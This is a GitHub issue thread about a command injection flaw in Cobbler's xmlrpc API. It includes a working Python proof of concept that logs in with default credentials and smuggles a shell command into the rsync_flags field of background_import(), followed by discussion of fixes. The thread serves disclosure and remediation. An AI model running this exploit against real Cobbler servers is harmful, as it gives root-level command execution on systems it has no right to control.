### ISSUE TITLE
Cobbler: xmlrpc interface vulnerable to command injection through multiple API functions

### ISSUE THREAD

**Issue by yspiner** [cobbler/cobbler#1329]
Some of the options that can be passed to various Cobbler xmlrpc
functions can be used to inject shell commands.  This offers arbitrary
command execution to any user that has permission to run the commands.
By default the Cobbler xmlrpc service seems to run as root, giving total
control over the server.

This issue was initially discovered in the background_import() API
function where it is possible to inject commands into the rsync_flags
parameter of the options set by the user.

A number of other API functions follow a similar style of execution and
are potentially susceptible to the same type of attack.  For example,
the 'adduser' option for background_aclsetup() is also exploitable.

**Comment by SchoolGuy** [comment]
FYI: @agraul @meaksh @vzhestkov

**Comment by SchoolGuy** [comment]
@yspiner I am aware your profile feel silent for a long time. In case you are around:

Are there any additional information you could add to this issue? Some bits and pieces are designed to pass additional shell parameters to certain tools. Do you maybe have PoC code that I could try out?

**Comment by patrickhener** [comment]
A proof of concept would be:

```py
import xmlrpc.client
import random
import string

server = xmlrpc.client.ServerProxy("http://target-ip/cobbler_api")
token = server.login("cobbler", "cobbler")
random_string = "".join(random.choices(string.ascii_letters + string.digits, k=8))
cmd = "ping -c4 attacker-ip"
import_options = {
    "path": "rsync://attacker-ip/",
    "name": random_string,  # mandatory, has to be unique, vulnerable to cmd injection
    "available_as": "",  # also known as network_root in the code, optional
    "autoinstall_file": "",  # optional
    "rsync_flags": f"; {cmd} #",  # vulnerable to os cmd injection
    "arch": "x86",  # optional
    "breed": "",  # optional
    "os_version": "",  # optional
}
print(server.background_import(import_options, token))
```

Still works on the latest release 3.3.6.

Vulnerability rating would be CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - 8.1 (High)

**Comment by SchoolGuy** [comment]
@patrickhener Thanks for the POC. I am not aware how to fix that as a semicolon can be a valid value for the value of a flag. Also this assumes that you already have stolen or gained access to a login token.

**Comment by patrickhener** [comment]
@SchoolGuy this is correct. You will need to have the api credentials for this attack to work. Thus, in CVSS PR:L (privilege required - low) was chosen. I am not quite sure if you are correct. On the top of my head I cannot think of a situation where you would need a ; in a flag. Maybe I am wrong. Also don't forget about && and ||. Those could also be used. In general, user input sanitization could be a thing. Also you could use shell=False, which is not the case for the specific call. If shell would be False, then at least you narrow it down from a command execution to an argument execution. Still, rsync does offer -e, which could be used to run commands.
